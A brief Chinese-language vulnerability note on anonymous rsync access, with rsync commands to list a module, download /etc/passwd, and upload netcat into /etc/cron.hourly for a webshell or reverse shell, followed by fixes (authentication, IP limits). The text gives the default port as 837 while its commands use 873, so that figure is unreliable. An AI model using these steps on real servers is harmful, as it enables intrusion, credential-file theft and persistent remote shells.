Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,默认端口837。
1、漏洞利用
#列举整个同步目录或指定目录: rsync rsync://172.16.2.250:873/src #下载文件或目录到本地: rsync rsync://172.16.2.250:873/src/etc/passwd ./ #上传本地文件到服务端: rsync -av nc rsync://172.16.2.250:873/src/etc/cron.hourly #上传的文件可以直接是webshell或crontab反弹shell
2、修复建议
- 添加认证
- 限制IP访问